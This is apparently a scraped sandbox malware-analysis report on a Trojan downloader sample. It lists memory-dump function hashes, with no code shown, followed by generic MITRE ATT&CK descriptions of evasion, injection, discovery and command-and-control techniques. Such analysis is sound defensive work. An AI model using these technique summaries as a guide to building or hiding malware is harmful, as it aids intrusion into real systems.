Opcode ID: b9b4368492b251142fa010634cd8820fd244916a413dfe2ec925a0ba621775b7
Instruction ID: e1673bb54183ecdbfc5ed00cae674e4a3659e3a4c7c9412aacd8867a94c1b19d
Opcode Fuzzy Hash: b9b4368492b251142fa010634cd8820fd244916a413dfe2ec925a0ba621775b7
Instruction Fuzzy Hash: 1121A1303042508FDB6A6A35E81872F7BEBAF88654F14402AE926DB389DF748C43C791

Uniqueness

Uniqueness Score: -1.00%

Function 05050521, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86601c020bce653dddbee039c9a80ec7aa5e07fd1df210d4508ea2119a3ff628
Instruction ID: 91dd9c4a9607f965c80b5516af478026c5daa8b5b201e71f7d0d74e612e2b7b0
Opcode Fuzzy Hash: 86601c020bce653dddbee039c9a80ec7aa5e07fd1df210d4508ea2119a3ff628
Instruction Fuzzy Hash: B8111A703002108FC7996B7DD164A7E3AD3AFC5315B24407AE407CB7A5DE398D428B95

Uniqueness

Uniqueness Score: -1.00%

Function 05051A28, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f449bd2a56bdab76e660efd237b8aec6f6089508c5940d9ed5ebf7e021953da
Instruction ID: 3a6cbd3bf06fee44fb82cf297165e0a610d10c437f649492529da0f90956fde5
Opcode Fuzzy Hash: 4f449bd2a56bdab76e660efd237b8aec6f6089508c5940d9ed5ebf7e021953da
Instruction Fuzzy Hash: 88213631301311CFCB05AB39D454A5A7BE6FF8A21631100BEE009CB3A1DB32DC42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05050530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd8e77da1bf5165055829897dc36c6edc1488853d7b7e9fb8e16bfaa3f5c653
Instruction ID: 6c02f37840eecfc8ef97664b7a01eec6aeb58bc4c7d4ab4ccbdb69403e6a8d61
Opcode Fuzzy Hash: 4dd8e77da1bf5165055829897dc36c6edc1488853d7b7e9fb8e16bfaa3f5c653
Instruction Fuzzy Hash: D61107703002108BC799BB7DD068A2E3AD7AFC5305B24407AE407CF7A5DE399C428B86

Uniqueness

Uniqueness Score: -1.00%

Function 0505187A, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f361b4113ecf2bba7fc4480a9d2130abba4becc6a3c8d2873229c47e65e133
Instruction ID: 825c864da7e1ca94c1e49752b81ae18c2568ea0afd6d76faac561e8f0e9b497d
Opcode Fuzzy Hash: 07f361b4113ecf2bba7fc4480a9d2130abba4becc6a3c8d2873229c47e65e133
Instruction Fuzzy Hash: 950192357045268BC658F77AD450B7E33D7ABC8610B244628D506DB3C8EF34DD02DB96

Uniqueness

Uniqueness Score: -1.00%

Function 05051570, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9144b2d46ecb7eb375a16a10c61bde6b40402bbf0ca65a9ec60b1e0b636654db
Instruction ID: 5058cddf57f128ee15b7fbfb291810e3884f66ce4b0544be88ce89fa17c527ae
Opcode Fuzzy Hash: 9144b2d46ecb7eb375a16a10c61bde6b40402bbf0ca65a9ec60b1e0b636654db
Instruction Fuzzy Hash: 04019E3A7002148BDB64AA79E9487AF77EBAB84260F04457AED26C7244EB759C44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05051D7A, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2d64a4498e6f1e5adcc2f2dee24d3468981d7eea037f4153cd082c64e8516e
Instruction ID: c2f86a0356f5a88255b489de1a4fc313cff455daab9f06e3eb9a3253e3325dec
Opcode Fuzzy Hash: 3f2d64a4498e6f1e5adcc2f2dee24d3468981d7eea037f4153cd082c64e8516e
Instruction Fuzzy Hash: 3A01D6306053829BD71A5725D814B6E7FFB9F81614F28806B98A5EB386DF388C06C761

Uniqueness

Uniqueness Score: -1.00%

Function 00D405CF, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.249184656.0000000000D40000.00000040.00000040.sdmp, Offset: 00D40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f290722c6dfcbdb961be58c639da3aa9bc01642f24dbb1a1223423aba7fdf0fe
Instruction ID: d6a586cb1a9b89a5b43acc08cb56ca14263258363dec81565ba63a942d8427de
Opcode Fuzzy Hash: f290722c6dfcbdb961be58c639da3aa9bc01642f24dbb1a1223423aba7fdf0fe
Instruction Fuzzy Hash: E901D676549780AFD3128B56EC40897BFF8DF8623070980ABED498B211D125A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05051770, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a794955ac44a9c273d2f0a1333d188dec4a0fe4165422a403359a1c68deb64b
Instruction ID: c8d3f1399082be5acf85bfcd87adf76ef13fd53934d7270a50e058229175d00a
Opcode Fuzzy Hash: 7a794955ac44a9c273d2f0a1333d188dec4a0fe4165422a403359a1c68deb64b
Instruction Fuzzy Hash: 4601D6317001208FC704EB7CD408B2A3FE6EF89715F1940A9E005CB395DE718C40C791

Uniqueness

Uniqueness Score: -1.00%

Function 050517F2, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f675360758aa6512d57c1170e7d7ea7c58bb028db4cb8479ee74d2e6e1c7b95
Instruction ID: 38b8a164b0e6789d65698e4cca9fa0050cc8b56aef5f4f262f25b8b85bf00404
Opcode Fuzzy Hash: 7f675360758aa6512d57c1170e7d7ea7c58bb028db4cb8479ee74d2e6e1c7b95
Instruction Fuzzy Hash: C7F0AF317005264BC658B77AD420B7E37DBABC9250B240529D546C73C4EF39DD02CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 05051D88, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536c2f9f993ae651a940e0d0c440271c855bab00c7fcd581bda67313dc5f64f1
Instruction ID: cf6d9f6efda547fa71995d4bfcf66f4e58790cda1ce95cb8bd5f3386474bda0b
Opcode Fuzzy Hash: 536c2f9f993ae651a940e0d0c440271c855bab00c7fcd581bda67313dc5f64f1
Instruction Fuzzy Hash: 4BF0C2306053829FD72E5765D424B6E7FFBAF81610F24806A98A6DB386DF348C06C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 05050630, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca6850e6afb33868724300603e04a19f57d17006d8c47becf55b761af546dfa
Instruction ID: eef994d6e5ba7954605755aba5ff206afe290b0072c000dc211afbc3d20984dd
Opcode Fuzzy Hash: 3ca6850e6afb33868724300603e04a19f57d17006d8c47becf55b761af546dfa
Instruction Fuzzy Hash: 57F09031B001104FC75DAB39E41C66E7BE7EBC8625B18807AD92AE7364DF344C078B96

Uniqueness

Uniqueness Score: -1.00%

Function 050518E8, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d200fa6680ddfa62dfa83021b22027b25c226cb5d0cf2a90f48e717a54a35397
Instruction ID: 062506e012d5882aef0e16346132141b4cc24135215ca81eb489782289fb76bf
Opcode Fuzzy Hash: d200fa6680ddfa62dfa83021b22027b25c226cb5d0cf2a90f48e717a54a35397
Instruction Fuzzy Hash: 1BF082327002109FC758DF29E88889EBBA6EFD9351311843BE516D7205DEB18C068B50

Uniqueness

Uniqueness Score: -1.00%

Function 05050640, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddc6d274349dded76818393229fbbd357a21e55652e238960888db6eb55e25d
Instruction ID: b9388c2bcdb15db2189f59c873990b0c8424ce2d22715e05a594757fbab098ec
Opcode Fuzzy Hash: 0ddc6d274349dded76818393229fbbd357a21e55652e238960888db6eb55e25d
Instruction Fuzzy Hash: 8BE06D357104114B875EB73AA41C52E7BE7ABC8521318807AEA2BD7398DF304C03879A

Uniqueness

Uniqueness Score: -1.00%

Function 05051990, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa1daacebc04c47895a9b047caa3ad7be1227f7f7e06a453c59b2ff80c55680
Instruction ID: db7de8ac9cba3eb43b066b4affc253c688bda9b27a04b83d94099fb922735440
Opcode Fuzzy Hash: 7aa1daacebc04c47895a9b047caa3ad7be1227f7f7e06a453c59b2ff80c55680
Instruction Fuzzy Hash: E4E0ED312043104BC76866BDA410BAFBBEACBCA311F14406FE00583391CAB498028B90

Uniqueness

Uniqueness Score: -1.00%

Function 050518F8, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6e99e0d3a3cd3c1de3dff859b01e710be005409daec9e429e111a13375ec05
Instruction ID: 88bfb2d5ffa0de26604b0d10c26327bea90d7379e6d13cfda7910b5a234c3ab7
Opcode Fuzzy Hash: 3c6e99e0d3a3cd3c1de3dff859b01e710be005409daec9e429e111a13375ec05
Instruction Fuzzy Hash: 77E0E5353011145BC758EE29E84485EBB9BEBC92513518536B51A97305DEB19C058750

Uniqueness

Uniqueness Score: -1.00%

Function 00D405F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.249184656.0000000000D40000.00000040.00000040.sdmp, Offset: 00D40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39841fa78ce16ea3784cec0c9e6301339cdcd24de82904f3e8e9207ad35d19a5
Instruction ID: c72d8aec26aac006a2c324efe7b6ea31d5b43f554a7b73156e360c2222131588
Opcode Fuzzy Hash: 39841fa78ce16ea3784cec0c9e6301339cdcd24de82904f3e8e9207ad35d19a5
Instruction Fuzzy Hash: 9CE09276A406008BD750CF0BEC81456F7D8EB88630B18C07FDC0D8B700E135B904CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 050519A0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bb4c95022579eccc77926fb1e66cc3198728fd5e8964209410915f65968ced
Instruction ID: 215eadc30b084d4a69c0cafdedab7d2b0aec6e350aa78025d876283413acd732
Opcode Fuzzy Hash: e7bb4c95022579eccc77926fb1e66cc3198728fd5e8964209410915f65968ced
Instruction Fuzzy Hash: B2E0C2353042108BC70872AEE010A5F77DECBCA325B10407BE509C7390CEB1AC4287E5

Uniqueness

Uniqueness Score: -1.00%

Function 050506C8, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c32571a4f011d6a81306b8fb72ad7f28a1af344828692f41a474c918988dec2
Instruction ID: 82d4afb3bc470181b819e378326530b93ab41fd10185f8119bb0d944fca172a6
Opcode Fuzzy Hash: 7c32571a4f011d6a81306b8fb72ad7f28a1af344828692f41a474c918988dec2
Instruction Fuzzy Hash: 39D0A7B7204100BBE34C8A20EC09FBF2BDDD784771F244155B431F11C0EB6081404232

Uniqueness

Uniqueness Score: -1.00%

Function 05050251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3517bb76227c35b647f2e84d3d827390d711f1e092f2a3b072d8f8264b9e60cf
Instruction ID: 846aaa4af47ffd9edd2c6f9badd19920c18c8f188a06ac342095dcae8d8837d7
Opcode Fuzzy Hash: 3517bb76227c35b647f2e84d3d827390d711f1e092f2a3b072d8f8264b9e60cf
Instruction Fuzzy Hash: B2D0C936B000108FDB1096ADF8181ECBBA6AFC4225B20107AD60ADB651E92189198601

Uniqueness

Uniqueness Score: -1.00%

Function 011823F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.249499101.0000000001182000.00000040.00000001.sdmp, Offset: 01182000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55030aca6bd11d0e7549169e28baf5a6f95a74b3bf8d5f78d0fc1c2db01a2ad
Instruction ID: a1d9fc6aa7e3b5d0baa2f60c0dadd40eb9c697c45aa8e598fbe61d6e4f064f7a
Opcode Fuzzy Hash: e55030aca6bd11d0e7549169e28baf5a6f95a74b3bf8d5f78d0fc1c2db01a2ad
Instruction Fuzzy Hash: 81D05E79315A818FE32B9A1CC1A8B953FA4AB51B04F5684FEE8008B663C368D981D610

Uniqueness

Uniqueness Score: -1.00%

Function 050518BA, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fda46444b74f8bfe8204828086c8335a933adffa81acd489e69dde1ba98017
Instruction ID: cc876e0162eed9376ea563a2058c63f926469e8e31e1a879d94b5e79498e5f19
Opcode Fuzzy Hash: 19fda46444b74f8bfe8204828086c8335a933adffa81acd489e69dde1ba98017
Instruction Fuzzy Hash: E5D05EB48053019FC740DF14D845B6BB7F4EB90701F45C92DE099C2104F2359A58CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011823BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.249499101.0000000001182000.00000040.00000001.sdmp, Offset: 01182000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d9ad622a8e7a8b768a9bd3b6d69258f00dcf56d7ad71d59159ecf164d87d0f
Instruction ID: e7c9eb74ab34c9e0e70a17fdd7fe13c3ea901458daec32801648d9a436675465
Opcode Fuzzy Hash: 41d9ad622a8e7a8b768a9bd3b6d69258f00dcf56d7ad71d59159ecf164d87d0f
Instruction Fuzzy Hash: 7BD05E342042818BD71AEB0CC5A4F593BD4AB45B00F0684E8BD008B662C3B4D981CA00

Uniqueness

Uniqueness Score: -1.00%

Function 05050130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de43e9417813eae22c0e007bf3c819b5f1256aed80e8ba8f3da337d7a07e390f
Instruction ID: 36168a2abe01e292d3109d55a2a27a289e021a91a96c60e9a2d59b8a5a492c8c
Opcode Fuzzy Hash: de43e9417813eae22c0e007bf3c819b5f1256aed80e8ba8f3da337d7a07e390f
Instruction Fuzzy Hash: 97C02B3035860807DF101AF8B88832F33CCB7C0314F040431B82EC7150FC2AD8804340

Uniqueness

Uniqueness Score: -1.00%

Function 050518C8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fca5e1e7c01ed41de1a47e92a617ca73ba33ae503a5a96e627866f4b12bdb1
Instruction ID: e39511e71ae3c3000ffb81c70e12ebe66b5062509d9bb49cb93a5e8de1804790
Opcode Fuzzy Hash: 60fca5e1e7c01ed41de1a47e92a617ca73ba33ae503a5a96e627866f4b12bdb1
Instruction Fuzzy Hash: 95C01270418201AFC744EF28EC4596ABBF0EA80605F40C93DE49DC2114F270555CCB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.DownLoader36.7233.23906.21829

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 00321090, Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 147
librarynativeloaderCOMMON

Function 00322902, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 003223D7, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 003212F4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Function 00326D6C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre